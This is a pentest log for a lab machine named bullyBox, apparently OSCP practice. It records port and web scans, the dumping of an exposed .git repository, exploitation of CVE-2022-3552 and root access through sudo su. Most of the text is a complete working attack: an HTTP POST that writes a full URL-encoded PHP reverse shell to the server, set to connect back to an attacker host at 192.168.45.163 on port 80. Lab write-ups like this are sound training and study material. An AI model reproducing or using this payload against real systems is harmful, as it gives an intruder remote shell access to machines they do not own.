bullyBox
Pentest Log: 2025-08-15
Target Information
- Machine Name: bullyBox
- IP Address: 192.168.223.27
- Operating System: Linux
ip=192.168.223.27   # lab target address; every command below expands $ip
Enumeration
Port Scanning
Commands used:
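# Full-range TCP sweep first (fast, no scripts) to learn which ports answer,
# then a default-script + version scan restricted to those ports so the slow
# part of the scan only touches what is actually open.
ports=$(nmap -p- --min-rate=1000 -T4 "$ip" | grep '^[0-9]' | cut -d '/' -f 1 | paste -sd,)
# Guard the second scan: with an empty port list nmap rejects "-p" and aborts.
if [ -n "$ports" ]; then
    nmap -p"$ports" -sC -sV "$ip" -oN tcp_scan_result.txt
else
    echo "no open TCP ports found on $ip; skipping the service scan" >&2
fi
# UDP is scanned independently of the TCP result (top 100 ports only).
nmap -sU --top-ports 100 "$ip" -oN udp_scan_result.txt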
Port 22
Port 80
Web Directory Scan
# Web content discovery on port 80: two wordlist-driven directory scans
# (dirsearch recursive, results saved to dirsearch.txt) plus a WordPress scan.
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
wpscan --url http://$ip
Found an exposed .git directory; dumped the repository with git-dumper:
# Reconstructs the site's source tree from the exposed .git/ directory into the local working folder
python3 ./git_dumper.py http://$ip ~/Documents/oscp/play_ground/bullyBox
Exploitation
Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: RCE
Exploit Execution
Exploit Method
Tool / Script Used:
https://github.com/0xk4b1r/CVE-2022-3552/blob/main/CVE-2022-3552.py
POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1
Host: bullybox.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://bullybox.local/bb-admin/order
Content-Type: application/x-www-form-urlencoded
Content-Length: 9959
Origin: http://bullybox.local
Connection: keep-alive
Cookie: PHPSESSID=g2gk367ldso50tpchf6ltmi28r
Upgrade-Insecure-Requests: 1
Priority: u=0, i
order_id=1&path=ax.php&data=<%3fphp
//+Copyright+(c)+2020+Ivan+Sincek
//+v2.3
//+Requires+PHP+v5.0.0+or+greater.
//+Works+on+Linux+OS,+macOS,+and+Windows+OS.
//+See+the+original+script+at+https%3a//github.com/pentestmonkey/php-reverse-shell.
class+Shell+{
++++private+$addr++%3d+null%3b
++++private+$port++%3d+null%3b
++++private+$os++++%3d+null%3b
++++private+$shell+%3d+null%3b
++++private+$descriptorspec+%3d+array(
++++++++0+%3d>+array('pipe',+'r'),+//+shell+can+read+from+STDIN
++++++++1+%3d>+array('pipe',+'w'),+//+shell+can+write+to+STDOUT
++++++++2+%3d>+array('pipe',+'w')++//+shell+can+write+to+STDERR
++++)%3b
++++private+$buffer++%3d+1024%3b++++//+read/write+buffer+size
++++private+$clen++++%3d+0%3b+++++++//+command+length
++++private+$error+++%3d+false%3b+++//+stream+read/write+error
++++public+function+__construct($addr,+$port)+{
++++++++$this->addr+%3d+$addr%3b
++++++++$this->port+%3d+$port%3b
++++}
++++private+function+detect()+{
++++++++$detected+%3d+true%3b
++++++++if+(stripos(PHP_OS,+'LINUX')+!%3d%3d+false)+{+//+same+for+macOS
++++++++++++$this->os++++%3d+'LINUX'%3b
++++++++++++$this->shell+%3d+'/bin/bash'%3b
++++++++}+else+if+(stripos(PHP_OS,+'WIN32')+!%3d%3d+false+||+stripos(PHP_OS,+'WINNT')+!%3d%3d+false+||+stripos(PHP_OS,+'WINDOWS')+!%3d%3d+false)+{
++++++++++++$this->os++++%3d+'WINDOWS'%3b
++++++++++++$this->shell+%3d+'cmd.exe'%3b
++++++++}+else+{
++++++++++++$detected+%3d+false%3b
++++++++++++echo+"SYS_ERROR%3a+Underlying+operating+system+is+not+supported,+script+will+now+exit...\n"%3b
++++++++}
++++++++return+$detected%3b
++++}
++++private+function+daemonize()+{
++++++++$exit+%3d+false%3b
++++++++if+(!function_exists('pcntl_fork'))+{
++++++++++++echo+"DAEMONIZE%3a+pcntl_fork()+does+not+exists,+moving+on...\n"%3b
++++++++}+else+if+(($pid+%3d+%40pcntl_fork())+<+0)+{
++++++++++++echo+"DAEMONIZE%3a+Cannot+fork+off+the+parent+process,+moving+on...\n"%3b
++++++++}+else+if+($pid+>+0)+{
++++++++++++$exit+%3d+true%3b
++++++++++++echo+"DAEMONIZE%3a+Child+process+forked+off+successfully,+parent+process+will+now+exit...\n"%3b
++++++++}+else+if+(posix_setsid()+<+0)+{
++++++++++++//+once+daemonized+you+will+actually+no+longer+see+the+script's+dump
++++++++++++echo+"DAEMONIZE%3a+Forked+off+the+parent+process+but+cannot+set+a+new+SID,+moving+on+as+an+orphan...\n"%3b
++++++++}+else+{
++++++++++++echo+"DAEMONIZE%3a+Completed+successfully!\n"%3b
++++++++}
++++++++return+$exit%3b
++++}
++++private+function+settings()+{
++++++++%40error_reporting(0)%3b
++++++++%40set_time_limit(0)%3b+//+do+not+impose+the+script+execution+time+limit
++++++++%40umask(0)%3b+//+set+the+file/directory+permissions+-+666+for+files+and+777+for+directories
++++}
++++private+function+dump($data)+{
++++++++$data+%3d+str_replace('<',+'%26lt%3b',+$data)%3b
++++++++$data+%3d+str_replace('>',+'%26gt%3b',+$data)%3b
++++++++echo+$data%3b
++++}
++++private+function+read($stream,+$name,+$buffer)+{
++++++++if+(($data+%3d+%40fread($stream,+$buffer))+%3d%3d%3d+false)+{+//+suppress+an+error+when+reading+from+a+closed+blocking+stream
++++++++++++$this->error+%3d+true%3b++++++++++++++++++++++++++++//+set+global+error+flag
++++++++++++echo+"STRM_ERROR%3a+Cannot+read+from+${name},+script+will+now+exit...\n"%3b
++++++++}
++++++++return+$data%3b
++++}
++++private+function+write($stream,+$name,+$data)+{
++++++++if+(($bytes+%3d+%40fwrite($stream,+$data))+%3d%3d%3d+false)+{+//+suppress+an+error+when+writing+to+a+closed+blocking+stream
++++++++++++$this->error+%3d+true%3b++++++++++++++++++++++++++++//+set+global+error+flag
++++++++++++echo+"STRM_ERROR%3a+Cannot+write+to+${name},+script+will+now+exit...\n"%3b
++++++++}
++++++++return+$bytes%3b
++++}
++++//+read/write+method+for+non-blocking+streams
++++private+function+rw($input,+$output,+$iname,+$oname)+{
++++++++while+(($data+%3d+$this->read($input,+$iname,+$this->buffer))+%26%26+$this->write($output,+$oname,+$data))+{
++++++++++++if+($this->os+%3d%3d%3d+'WINDOWS'+%26%26+$oname+%3d%3d%3d+'STDIN')+{+$this->clen+%2b%3d+strlen($data)%3b+}+//+calculate+the+command+length
++++++++++++$this->dump($data)%3b+//+script's+dump
++++++++}
++++}
++++//+read/write+method+for+blocking+streams+(e.g.+for+STDOUT+and+STDERR+on+Windows+OS)
++++//+we+must+read+the+exact+byte+length+from+a+stream+and+not+a+single+byte+more
++++private+function+brw($input,+$output,+$iname,+$oname)+{
++++++++$fstat+%3d+fstat($input)%3b
++++++++$size+%3d+$fstat['size']%3b
++++++++if+($this->os+%3d%3d%3d+'WINDOWS'+%26%26+$iname+%3d%3d%3d+'STDOUT'+%26%26+$this->clen)+{
++++++++++++//+for+some+reason+Windows+OS+pipes+STDIN+into+STDOUT
++++++++++++//+we+do+not+like+that
++++++++++++//+we+need+to+discard+the+data+from+the+stream
++++++++++++while+($this->clen+>+0+%26%26+($bytes+%3d+$this->clen+>%3d+$this->buffer+%3f+$this->buffer+%3a+$this->clen)+%26%26+$this->read($input,+$iname,+$bytes))+{
++++++++++++++++$this->clen+-%3d+$bytes%3b
++++++++++++++++$size+-%3d+$bytes%3b
++++++++++++}
++++++++}
++++++++while+($size+>+0+%26%26+($bytes+%3d+$size+>%3d+$this->buffer+%3f+$this->buffer+%3a+$size)+%26%26+($data+%3d+$this->read($input,+$iname,+$bytes))+%26%26+$this->write($output,+$oname,+$data))+{
++++++++++++$size+-%3d+$bytes%3b
++++++++++++$this->dump($data)%3b+//+script's+dump
++++++++}
++++}
++++public+function+run()+{
++++++++if+($this->detect()+%26%26+!$this->daemonize())+{
++++++++++++$this->settings()%3b
++++++++++++//+-----+SOCKET+BEGIN+-----
++++++++++++$socket+%3d+%40fsockopen($this->addr,+$this->port,+$errno,+$errstr,+30)%3b
++++++++++++if+(!$socket)+{
++++++++++++++++echo+"SOC_ERROR%3a+{$errno}%3a+{$errstr}\n"%3b
++++++++++++}+else+{
++++++++++++++++stream_set_blocking($socket,+false)%3b+//+set+the+socket+stream+to+non-blocking+mode+|+returns+'true'+on+Windows+OS
++++++++++++++++//+-----+SHELL+BEGIN+-----
++++++++++++++++$process+%3d+%40proc_open($this->shell,+$this->descriptorspec,+$pipes,+null,+null)%3b
++++++++++++++++if+(!$process)+{
++++++++++++++++++++echo+"PROC_ERROR%3a+Cannot+start+the+shell\n"%3b
++++++++++++++++}+else+{
++++++++++++++++++++foreach+($pipes+as+$pipe)+{
++++++++++++++++++++++++stream_set_blocking($pipe,+false)%3b+//+set+the+shell+streams+to+non-blocking+mode+|+returns+'false'+on+Windows+OS
++++++++++++++++++++}
++++++++++++++++++++//+-----+WORK+BEGIN+-----
++++++++++++++++++++$status+%3d+proc_get_status($process)%3b
++++++++++++++++++++%40fwrite($socket,+"SOCKET%3a+Shell+has+connected!+PID%3a+"+.+$status['pid']+.+"\n")%3b
++++++++++++++++++++do+{
$status+%3d+proc_get_status($process)%3b
++++++++++++++++++++++++if+(feof($socket))+{+//+check+for+end-of-file+on+SOCKET
++++++++++++++++++++++++++++echo+"SOC_ERROR%3a+Shell+connection+has+been+terminated\n"%3b+break%3b
++++++++++++++++++++++++}+else+if+(feof($pipes[1])+||+!$status['running'])+{+++++++++++++++++//+check+for+end-of-file+on+STDOUT+or+if+process+is+still+running
++++++++++++++++++++++++++++echo+"PROC_ERROR%3a+Shell+process+has+been+terminated\n"%3b+++break%3b+//+feof()+does+not+work+with+blocking+streams
++++++++++++++++++++++++}++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++//+use+proc_get_status()+instead
++++++++++++++++++++++++$streams+%3d+array(
++++++++++++++++++++++++++++'read'+++%3d>+array($socket,+$pipes[1],+$pipes[2]),+//+SOCKET+|+STDOUT+|+STDERR
++++++++++++++++++++++++++++'write'++%3d>+null,
++++++++++++++++++++++++++++'except'+%3d>+null
++++++++++++++++++++++++)%3b
++++++++++++++++++++++++$num_changed_streams+%3d+%40stream_select($streams['read'],+$streams['write'],+$streams['except'],+0)%3b+//+wait+for+stream+changes+|+will+not+wait+on+Windows+OS
++++++++++++++++++++++++if+($num_changed_streams+%3d%3d%3d+false)+{
++++++++++++++++++++++++++++echo+"STRM_ERROR%3a+stream_select()+failed\n"%3b+break%3b
++++++++++++++++++++++++}+else+if+($num_changed_streams+>+0)+{
++++++++++++++++++++++++++++if+($this->os+%3d%3d%3d+'LINUX')+{
++++++++++++++++++++++++++++++++if+(in_array($socket++,+$streams['read']))+{+$this->rw($socket++,+$pipes[0],+'SOCKET',+'STDIN'+)%3b+}+//+read+from+SOCKET+and+write+to+STDIN
++++++++++++++++++++++++++++++++if+(in_array($pipes[2],+$streams['read']))+{+$this->rw($pipes[2],+$socket++,+'STDERR',+'SOCKET')%3b+}+//+read+from+STDERR+and+write+to+SOCKET
++++++++++++++++++++++++++++++++if+(in_array($pipes[1],+$streams['read']))+{+$this->rw($pipes[1],+$socket++,+'STDOUT',+'SOCKET')%3b+}+//+read+from+STDOUT+and+write+to+SOCKET
++++++++++++++++++++++++++++}+else+if+($this->os+%3d%3d%3d+'WINDOWS')+{
++++++++++++++++++++++++++++++++//+order+is+important
++++++++++++++++++++++++++++++++if+(in_array($socket,+$streams['read'])/*------*/)+{+$this->rw+($socket++,+$pipes[0],+'SOCKET',+'STDIN'+)%3b+}+//+read+from+SOCKET+and+write+to+STDIN
++++++++++++++++++++++++++++++++if+(($fstat+%3d+fstat($pipes[2]))+%26%26+$fstat['size'])+{+$this->brw($pipes[2],+$socket++,+'STDERR',+'SOCKET')%3b+}+//+read+from+STDERR+and+write+to+SOCKET
++++++++++++++++++++++++++++++++if+(($fstat+%3d+fstat($pipes[1]))+%26%26+$fstat['size'])+{+$this->brw($pipes[1],+$socket++,+'STDOUT',+'SOCKET')%3b+}+//+read+from+STDOUT+and+write+to+SOCKET
++++++++++++++++++++++++++++}
++++++++++++++++++++++++}
++++++++++++++++++++}+while+(!$this->error)%3b
++++++++++++++++++++//+------+WORK+END+------
++++++++++++++++++++foreach+($pipes+as+$pipe)+{
++++++++++++++++++++++++fclose($pipe)%3b
++++++++++++++++++++}
++++++++++++++++++++proc_close($process)%3b
++++++++++++++++}
++++++++++++++++//+------+SHELL+END+------
++++++++++++++++fclose($socket)%3b
++++++++++++}
++++++++++++//+------+SOCKET+END+------
++++++++}
++++}
}
echo+'<pre>'%3b
//+change+the+host+address+and/or+port+number+as+necessary
$sh+%3d+new+Shell('192.168.45.163',+80)%3b
$sh->run()%3b
unset($sh)%3b
//+garbage+collector+requires+PHP+v5.3.0+or+greater
//+%40gc_collect_cycles()%3b
echo+'</pre>'%3b
%3f>
Privilege Escalation
Current Access
- User: yuki
- Groups: yuki
- Shell Type: reverse shell
Enumeration
Sudo:
sudo -l   # list the commands this user may run through sudo
Privilege Escalation Exploit
Exploit Summary
- Technique Used: Sudo Abuse
- Target Binary/Service: Su
- Reference / Source: N/A
Exploit Steps
- Smash to root
sudo su -   # su is permitted via sudo (per the sudo -l result), so this yields a root login shell